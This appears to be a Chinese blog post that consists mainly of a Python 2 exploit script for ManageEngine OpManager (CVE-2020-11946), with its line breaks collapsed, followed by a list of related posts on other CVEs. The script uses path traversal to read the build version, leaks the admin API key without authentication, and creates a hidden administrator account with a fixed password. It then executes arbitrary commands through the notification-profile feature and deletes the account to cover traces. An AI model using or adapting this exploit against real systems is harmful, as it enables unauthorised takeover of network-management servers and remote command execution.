修正原始Exp部分内容 成功复现版本 124042

#!/usr/bin/python2import requests
import sys
import urllib3
import jsonurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)class OpManagerExploit():def __init__(self,url):self.url = urlself.ver = Noneself.api_key = Falsedef FindVer(self):ver_req = requests.get(self.url+'/js/%2e%2e/html/About.properties',verify=False,allow_redirects=False)if ver_req.status_code != 200:print '[-] Unexpected response to fingerprinting request, Bailing.'return Falseif ver_req.text.find('BUILD_NUMBER') == -1 or ver_req.text.find('BUILD_VERSION') == -1:print '[-] Unable to read OpManager version, Bailing'return Falset = ver_req.textself.ver = int(t[t.find('BUILD_NUMBER')+13:t.find('\n',t.find('BUILD_NUMBER'))].strip())print '\n[+] Build version of opManager is {}'.format(self.ver)print '[+] Found OpManager Version {}'.format(t[t.find('BUILD_VERSION')+13:t.find('\n',t.find('BUILD_VERSION'))].strip())def LeakApiKey(self):if self.ver >= 123127:leak_d = {'reqFrm':'fwacs','key':'true','user':'admin','process':'apikey'}leak_r = requests.post(self.url+'/servlet/sendData',verify=False,data = leak_d)if leak_r.status_code != 200:print '[-] Failed to extract API KEY.'return Falseif leak_r.text.find('key=Start') == -1:print '[-] Invalid response in LeakApiKey()'return Falsed = leak_r.textapi_key = d[d.find('key=Start',d.find('key=Start')+11)+10:].strip()print '[+] Got API Key {}'.format(api_key)return api_keyelse:leak_d = {'action':'getAPIKey'}leak_r = requests.post(self.url+'/oputilsServlet',verify=False,data = leak_d)if leak_r.status_code != 200:print '[-] Failed to extract API KEY.'return Falsed = leak_r.textif d.find('API_KEY=') == -1:print '[-] Failed to extract API key'return Falseapi_key = d[d.find('API_KEY=')+8:d.find('\n',d.find('API_KEY='))]print '[+] Got API Key {}'.format(api_key)return api_keydef AddUser(self,interact=False):if self.api_key is False:print '[+] Leaking API key to add a new user'self.api_key = self.LeakApiKey()if self.api_key is False:print '[-] Failed to leak api to add a user'return Falseif interact == True:username = raw_input('Username > ')password = raw_input('Password > ')else:username = 'support@localhost.net'password = 'P@ssw0rd'print '[+] Adding a new admin user'add_d = 'apiKey='+self.api_key+'&userName='+username+'&privilege=Administrators&password='+password+'&emailId='+username+'&tZone=null'print "url: {}, add_d: {}".format(self.url, add_d)add_r = requests.post(self.url+'/api/json/v2/admin/addUser?'+add_d,verify=False,headers={'Accept':'application/json'})if add_r.status_code != 200:print '[-] Failed to add a new user, invalid response'return Falseelse:try:resp = json.loads(add_r.text)except:print '[-] Failed to add user, Invalid response data'print "add_r: {}".format(add_r.content)return Falseif resp.keys()[0] == 'error':print '[+] Error {} while adding user'.format(resp['error']['message'])return Falseelse:print '[+] Success, Response from server: {}'.format(resp['result']['message'])return Truedef DeleteUser(self,interact=False):if self.api_key is False:print '[+] Leaking API key to delete a user'self.api_key = self.LeakApiKey()if self.api_key is False:print '[-] Failed to leak api to delete a user'return Falseif interact == True:username = raw_input('Username to delete> ')else:username = 'support@localhost.net'users_list = requests.get(self.url+'/api/json/nfausers/getAllUsers?apiKey='+self.api_key,verify=False).texttry:usl = json.loads(users_list)except:print '[-] Failed to obtain user list'return Falseuser_id = Nonefor u in usl:if u['uName'] == username:user_id = int(u['uID'])print '[+] Found user id {}'.format(user_id)breakif user_id is None:print '[-] Username not found 'return Falsedel_r = requests.post(self.url+'/api/json/admin/deleteUser?'+'apiKey='+self.api_key+"&userName"+username,data={"userName":username},verify=False)if del_r.status_code == 200:print '[+] User deleted successfully'return Trueelse:print '[-] User deletion Failed.'return Falsedef ExecuteCommand(self):if self.api_key is False:print '[+] Leaking API key for RCE'self.api_key = self.LeakApiKey()if self.api_key is False:print '[-] Failed to leak api for RCE'return Falseif self.AddUser() is False:print '[-] Failed to add user for RCE'return Falseprint '[+] Loggin in with the added user'proxies={'http':'http://127.0.0.1:8080','https':'https://127.0.0.1:8080'}login_dat = {'AUTHRULE_NAME':'Authenticator','clienttype':'html','ScreenWidth':'1920','ScreenHeight':'602','loginFromCookieData':'false','ntlmv2':'false','j_username':'support@localhost.net','j_password':'P@ssw0rd','signInAutomatically':'on','uname':''}sess = requests.Session()headers = {'Content-Type': 'application/x-www-form-urlencoded'}sess.get(self.url+'/apiclient/ember/Login.jsp',verify=False,allow_redirects=False)login_r = sess.post(self.url+'/apiclient/ember/j_security_check',headers=headers,data=login_dat,verify=False)#print login_r.textif login_r.status_code != 200 :print '[+] Login Failed...'self.DeleteUser()return Falseprint '[+] Login Successful.'command = raw_input('Command to execute> ')if self.ver > 123127:cmd_d = {'append':'true','command':command,'selectedseverities':'1,2,3,4','checkedhardwareMonitor':'true','selectAllhardwareMonitor':'true','selectedDevicesStr':'127.0.0.53','twoption':'All','profileType':'Run System Command','name':'POP'}#headers = {'X-ZCSRF-TOKEN': 'opmcsrftoken='+sess.cookies.get_dict()['opmcsrfcookie']}cmd_r = sess.post(self.url+'/client/api/json/admin/testNProfile',headers=headers,verify=False,data=cmd_d,allow_redirects=False,proxies=proxies)else:cmd_d = {'command':command,'selectedseverities':'1,2,3,4','checkeddevicemissespolls':'true','noofpolls':'1','deviceCategory':'iv_12','twoption':'All','profileType':'Run System Command','name':'as'}cmd_r = sess.post(self.url+'/api/json/admin/testNProfile?apiKey='+self.api_key,verify=False,data=cmd_d,allow_redirects=False,proxies=proxies)try:output = json.loads(cmd_r.text)except:print '[-] Invalid Response data from RCE request'self.DeleteUser()return Falseif output.keys()[0] == 'result':print '[+] Command successfully executed: {}'.format(output)print '[+] Done with RCE, Cleaning up user'self.DeleteUser()return Truedef Exploit(self):print '[+] Starting Exploit\n[+] Please choose operation'print '\t1) Execute Shell Command\n\t2) Add an admin user\n\t3) Delete a user\n\t4) Leak admin API Key'ch = raw_input("Choice> ")if ch == '1':self.ExecuteCommand()elif ch == '2':self.AddUser(interact=True)elif ch == '3':self.DeleteUser(interact=True)elif ch == '4':self.LeakApiKey()else:print '[-] wth is {}'.format(ch)if __name__ == '__main__':if len(sys.argv) < 2:print '[+] Usage: {} <url>'.format(sys.argv[0])exit(1)ex = OpManagerExploit(sys.argv[1].strip())if ex.FindVer() == False:exit(1)ex.Exploit()

CVE-2020-11946 ManageEngine OpManager 命令执行相关推荐

  1. 【CVE】CVE-2019-9193:PostgreSQL 任意命令执行漏洞

    起序:客户内网测试的时候遇到的,搭建一个环境,写个笔记记录一下. 一.靶场环境 使用的是 github 上的 vulhub 环境.PostgreSQL 版本为 10.7. vulhub:https:/ ...

  2. php打开网页执行即执行bat程序_CVE202011107:XAMPP任意命令执行漏洞复现

    0x00简介 XAMPP是一个把Apache网页服务器与PHP.Perl及MariaDB集合在一起的安裝包,允许用戶可以在自己的电脑上轻易的建立网页服务器.该软件与phpstudy类似. 2020年4 ...

  3. runtime无法执行grep_让你的 Shell 命令执行可视化和告警

    Sampler是一个用于shell命令执行,可视化和告警的工具.其配置使用的是一个简单的YAML文件. 1.为什么我需要它? 你可以直接从终端对任意动态进程进行采样 – 观察数据库中的更改,监控MQ动 ...

  4. cve-2019-11076 Cribl UI 1.5.0 未授权命令执行漏洞分析

    Cribl是一款日志分析工具.Cribl UI是其中的一个用户界面. Cribl UI 1.5.0版本中存在安全漏洞.远程攻击者可借助未认证的Web请求利用该漏洞运行任意命令. 前言 前几天瞎逛 Gi ...

  5. ctf xor题_从一道CTF题目谈PHP中的命令执行

    原创 Xenny 合天智汇 快睡的时候,打开B站发现有位用户留言,大意就是让我帮忙看一道题,正好当时有空,于是就打开了他发的链接,代码如下 很明显是一道PHP代码审计的题目,而且只需要绕过第三行的if ...

  6. 【安全漏洞】Rocket.Chat 远程命令执行漏洞分析

    简述 Rocket.Chat 是一个开源的完全可定制的通信平台,由 Javascript 开发,适用于具有高标准数据保护的组织. 2021年3月19日,该漏洞在 HackerOne 被提出,于2021 ...

  7. php禁用了所有命令执行的函数 怎么搞,PHP通过bypass disable functions执行系统命令的方法汇总...

    一.为什么要bypass disable functions 为了安全起见,很多运维人员会禁用PHP的一些"危险"函数,例如eval.exec.system等,将其写在php.in ...

  8. java rmi漏洞工具_学生会私房菜【20200924】Weblogic WLS核心组件反序列化命令执行突破(CVE20182628)漏洞复现...

    学生会私房菜 学生会私房菜是通过学生会信箱收集同学们的来稿,挑选其中的优质文档,不定期进行文档推送的主题. 本期文档内容为:Weblogic WLS核心组件反序列化命令执行突破(CVE-2018-26 ...

  9. 远程执行漏洞修复方案_请马上修复!SaltStack远程命令执行漏洞

    [漏洞预警]SaltStack远程命令执行漏洞(CVE-2020-11651.CVE-2020-11652) 2020年5月3日,阿里云应急响应中心监测到近日国外某安全团队披露了SaltStack存在 ...

  10. 命令执行(ctfshow)

    文章目录 介绍 PHP命令执行的参数 ${php代码} assert preg_replace() create_function() 介绍 构造一些payload 实现后门的搭建 array_map ...

最新文章

  1. C/C++ 中左值和右值的区别
  2. Google发布Zipkin与Stackdriver Trace的集成功能
  3. Dubbo 只注册,只订阅
  4. 2017年网易校招题 解救小易
  5. 单进程epoll版-TCP服务器(python 版)
  6. 列表推导式 python原理_python之列表推导式
  7. SSM框架笔记13:Spring MVC基础
  8. 粤嵌gec6818项目设计_西安市幸福林带景观及亮化设计国际竞赛终期评审会顺利举行...
  9. php导入sql文件到数据库中,PHP执行SQL文件并将SQL文件导入到数据库
  10. pytorch Alexnet
  11. JavaScript的OO特性:静态方法
  12. mv强制覆盖 shell_一个简单的linux命令 mv
  13. 开启“互联网+”模式打造智能移动APP巡检系统
  14. 相机参数设置程序_摄影:相机通用的参数设置,10个方面带你学会使用相机拍照...
  15. ARM汇编,MCR和MRC
  16. 天数怎么换算成月_小时天数换算(小时换算成天数怎么算)
  17. 5G笔记| 概述:F-OFDM、新型NOMA多址
  18. android检测cup温度工具,Android如何实现获取手机CPU的温度?
  19. Linux线程优先级
  20. 19上海网络赛 Light bulbs (差分)

热门文章

  1. 全国计算机等级考试怎么保存,全国计算机等级考试一级备考:Word文档保存为PDF文件...
  2. ES文件浏览器局域网传输文件分析
  3. 无限浏览器代理服务器,老司机浏览器无限版
  4. 全国、省、地级市、区县乡镇级矢量地图2021年(最新)
  5. 美观实用的BeautifulReport测试报告
  6. snmpwalk访问华为防火墙snmp服务超时失败问题
  7. 2022年双十一有哪些电子产品值得入手、超值电子产品推荐清单
  8. 微信小程序图片流动动画效果(附代码,图)
  9. 盘点40种常用的芯片封装技术
  10. sign-canvas 一个基于canvas开发,封装于Vue组件的通用手写签名板(电子签名板),支持pc端和移动端;